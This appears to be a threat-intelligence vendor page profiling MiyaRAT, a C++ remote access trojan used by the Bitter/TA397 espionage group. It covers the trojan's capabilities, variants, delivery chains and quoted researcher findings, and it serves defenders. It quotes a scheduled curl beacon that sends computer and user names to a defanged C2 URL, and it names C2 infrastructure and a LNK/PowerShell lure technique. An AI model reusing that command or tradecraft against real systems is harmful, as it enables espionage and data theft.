MiyaRAT is a custom C++ remote access trojan first observed in 2024 and used by the Bitter espionage group, also tracked as TA397 and APT-Q-37. It is part of Bitter’s progression from simpler downloaders toward more capable post-compromise tooling and has been deployed in espionage operations targeting government, diplomatic, defense, and other strategically relevant organizations, including activity against targets in South Asia and Turkey.
MiyaRAT is designed for interactive remote control and intelligence collection on compromised Windows systems. Documented capabilities include host reconnaissance, directory and file enumeration, file deletion, screenshot capture, shell or reverse-shell style command execution, file upload and download, and process termination. It gathers basic victim information before contacting command-and-control infrastructure, including system and user details, and then enters a command-processing loop awaiting operator instructions.
Observed variants show ongoing development. Early reporting identified a version labeled 1.1. Later variants appended version information to the initial host-information beacon and used simple XOR protection for command-and-control traffic. A 2025 variant retained largely the same operator functionality while modifying string decryption and command-and-control obfuscation, indicating iterative efforts to hinder signature-based detection rather than major architectural redesign. Across reporting, MiyaRAT has been characterized as operationally straightforward but actively maintained.
MiyaRAT has been delivered by Bitter through staged intrusion chains rather than as a standalone mass-distributed payload. Observed delivery methods include spearphishing-led compromises followed by manual operator activity and deployment via MSI installers acting as droppers. In at least one campaign, Bitter operators performed host enumeration and then selectively installed MiyaRAT as a follow-on payload, consistent with targeted espionage tradecraft and victim pre-filtering.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
ultimately distributing a brand new trojan horse, MiyaRat, in September. ... the PDB shows that the Trojan has been named "Miya" by the attackers, and the current version is 1.1.
23 distinct techniques documented for this family, organized by ATT&CK tactic.
The attack chain used... a shortcut (LNK) file that created a scheduled task on the target machine to pull down further payloads... the command then set up a scheduled task named “DsSvcCleanup”.
BDarkRAT includes standard RAT capabilities such as executing shell commands, downloading files, and managing files on the compromised system.
Inside the “Participation” stream was a base64 encoded PowerShell blob... This caused the ~tmp.pdf file to run the base64 encoded PowerShell contained within the “Participation” ADS stream...
Important strings are obfuscated with a simple encoding algorithm where each character is decoded by subtracting 1.
The email included... a shortcut (LNK) file masquerading as a PDF (PUBLIC INVESTMENTS PROJECTS 2025.pdf.lnk)... the user is lured to believe that a PDF file is being opened due to the extension pdf.lnk. By default, Windows hides the real extension of a file.
This scheduled task attempted to send target host information (username and computer name) with the curl utility every 17 minutes... GET hxxp://jacknwoods[.]com/jacds.php?jin=%computername%_%username%
The downloader starts by collecting system information, which includes username, computer name, and the operating system.
The Trojan first decrypts the C2 domain name "samsnewlooker.com"... calls WSAConnectByNameW to connect to port 56172 of the C2 server.
20 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
C++ malware family used alongside WmRAT in an espionage intrusion against a Turkish defense-sector organization.
Remote access trojan used by Bitter/TA397 in targeting activity (Turkey noted) as part of an espionage-focused toolset.
Custom remote access trojan used by Bitter/TA397 as part of its more advanced tooling for targeted espionage intrusions.
MiyaRAT is a remote access trojan (RAT) used by TA397 for persistent access and espionage, allowing the threat actor to control infected systems and exfiltrate sensitive data.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.